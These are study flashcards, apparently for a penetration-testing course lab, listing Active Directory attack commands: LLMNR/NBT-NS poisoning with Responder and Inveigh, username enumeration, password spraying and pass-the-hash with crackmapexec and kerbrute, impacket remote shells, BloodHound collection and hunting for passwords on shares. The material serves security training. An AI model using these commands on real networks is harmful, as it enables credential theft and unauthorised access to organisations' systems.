Windows Active Directories Flashcards
Identifying hosts:
How to identify hosts from a Linux attack box. List 4 methods (tools).
Look for ARP, mDNS and DNS requests and note the IPs.
1) sudo -E wireshark or tcpdump
2) responder -I tun0 -A (analyze mode; catches LLMNR/NBT-NS traffic the others don't show)
3) fping -asgq 172.16.5.0/23
4) nmap
AD username enumeration with no creds from Linux.
What tools?
1) kerbrute userenum -d <domain> --dc <ip> jsmith.txt -o result_users
2) enum4linux -U <ip>
3) rpcclient -U "" -N <ip>
4) crackmapexec smb <ip> --users
5) ldapsearch
6) windapsearch
LLMNR/NBT-NS poisoning with LINUX
Which tool and which flags?
Use responder -A (also try -w for WPAD, Web Proxy Auto-Discovery)
LLMNR/NBT-NS poisoning with WINDOWS
Which tool?
Use inveigh.exe
Press ESC for the interactive console
Look for the command GET NTLMV2UNIQUE
Enumerating password policies from Linux (4 tools)
1) crackmapexec, but you need the DC host and valid creds!
crackmapexec smb <ip> -u username -p password --pass-pol
2) rpcclient (SMB null session)
rpcclient -U "" -N <ip>
querydominfo, getdompwinfo
3) enum4linux -P <ip>
4) ldapsearch
Enumerating password policies from Windows (3 tools)
1) net use \\host\ipc$ "" /u:"" (e.g. host = DC01)
or net use \\DC01\ipc$ "password" /u:guest
2) net accounts
3) Import-Module PowerView.ps1
Get-DomainPolicy
Password spray (with a password or a hash) from Linux (3 tools)
1) for loop with rpcclient
2) kerbrute passwordspray -d domain --dc ip users_list "password"
3) sudo crackmapexec smb ip -u user_list -p Password
4) sudo crackmapexec smb ip_range --local-auth -u admin -H hash
Password spray from Windows
DomainPasswordSpray.ps1
Import-Module DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile file.txt -ErrorAction SilentlyContinue
If we have AD creds, from Linux:
1) enumerate users (3 tools)
2) logged-on users
3) shares (2 tools)
4) a single share
1) sudo crackmapexec smb ip -u .. -p .. --users
or
python3 windapsearch.py --dc-ip ip -u user@inlane.local -p .. --da (da = enumerate users) or -PU (enumerate privileged users)
or sudo bloodhound-python -u .. -p .. -ns ip -d domain -c all (creates a zip file)
2) sudo crackmapexec smb ip -u .. -p .. --loggedon-users
3) sudo crackmapexec smb ip -u .. -p .. --shares
or
smbmap -u .. -p .. -d domain -H <ip>
4) sudo crackmapexec smb ip -u .. -p .. --share share_name
create a remote session with impacket and credentials (2 tools)
psexec.py inlanefreight.local/user:password@ip
wmiexec.py inlanefreight.local/user:password@ip
SharpHound + BloodHound
sharphound.exe -c All -d domain (--ExcludeDCs)
If we have AD creds, from Windows PS (also check whether I'm alone on the host):
Import-Module ActiveDirectory (check with Get-Module)
1) Get-ADDomain
2) Get-ADUser (with SPN)
3) Get-ADTrust
4) Get-ADGroup
5) Get-ADGroupMember -Identity group_name
6) qwinsta
Tool to find passwords in AD shares from a local Windows machine
snaffler.exe -d domain -s -v data
In Windows, check defenses
netsh advfirewall show allprofiles (PS)
sc query windefend (CMD)
Windows, if I'm the SYSTEM user, how can I enumerate from PS?
dsquery user (computer, ...)